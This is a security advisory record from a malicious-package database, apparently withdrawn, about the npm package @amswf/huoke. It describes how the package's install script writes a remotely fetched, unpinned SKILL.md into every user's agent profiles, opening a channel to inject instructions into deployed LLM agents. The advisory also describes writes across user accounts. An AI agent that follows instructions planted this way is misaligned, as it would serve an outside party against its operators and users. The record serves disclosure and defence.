MAL-2026-4361

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@amswf/huoke/MAL-2026-4361.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4361

Withdrawn

2026-05-26T21:14:22Z

Published

2026-05-21T08:20:01Z

Modified

2026-05-27T00:32:01.040636888Z

Summary

Malicious code in @amswf/huoke (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (4ec868ff3c73d920bd9c3b66a0e725f2eaf427b83ade2ad0fae284be0386eff4)

On npm install, this package's postinstall runs node bin/huoke.js install-skill, which enumerates /home/* for every system user, finds each user's ~/.hermes/profiles/* directories, and for each one downloads SKILL.md from https://raw.githubusercontent.com/amswf/huoke/main/SKILL.md via curl -fsSL and writes the response into that user's profile under skills/. The fetch targets the mutable main branch with no commit pin and no hash/signature verification, and the package ignores its own locally-shipped SKILL.md in favor of the remote copy. SKILL.md is consumed by Hermes/OpenClaw as agent (LLM) instructions, so the maintainer can change the contents at any time after publish to inject new instructions into every installer's deployed agents — an attacker-controlled-content channel that does not require republishing the package. The write loop also crosses account boundaries: when the installer runs npm install with sufficient privileges (root/sudo, common in container images and CI), the package modifies files inside other system users' home directories, which the package has no business touching. Separately, the runtime CLI default endpoint is plain http://huoke.link, sending JWTs and credentials in cleartext — a quality issue affecting CLI users but not the basis for this verdict.

Database specific

{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.9.0"
            ],
            "modified_time": "2026-05-21T08:20:01Z",
            "sha256": "358a0c48fb69e1c65e772be88f2150b69fd6e7c5a6a8d3aee16ffc286bc607fd",
            "id": "IN-MAL-2026-003781",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:18.088679876Z"
        },
        {
            "versions": [
                "1.9.1"
            ],
            "modified_time": "2026-05-21T08:34:12Z",
            "sha256": "4ec868ff3c73d920bd9c3b66a0e725f2eaf427b83ade2ad0fae284be0386eff4",
            "id": "IN-MAL-2026-003783",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:18.31300665Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / @amswf/huoke

Package

Name: @amswf/huoke; View open source insights on deps.dev
Purl: pkg:npm/%40amswf%2Fhuoke

Affected ranges

Affected versions

1.*

1.9.0

1.9.1

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]

indicators

{
    "package_integrity": [
        {
            "filename": "huoke-1.9.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-ejjPJpaL/zsugfhlii2BdjMVpoc9hjydHRBMflOkSNUMcQxDWRikdab7RYzJcI4BlBqiNfn7+PVwPr6Atk3HTA==",
                "sha1": "5a85071b1aa933df090bc013b9918be73f5c6f0b"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "bin/huoke.js",
            "tlsh": "82c2763418fa24703523e4acab8b60027119f9037449dd5876adb36e5fcda34daa36fd",
            "sha256": "4c45619b6796923309467847c0bc3e5c3d93e7f2c03287cb95212985e9b96d92"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@amswf/huoke/MAL-2026-4361.json"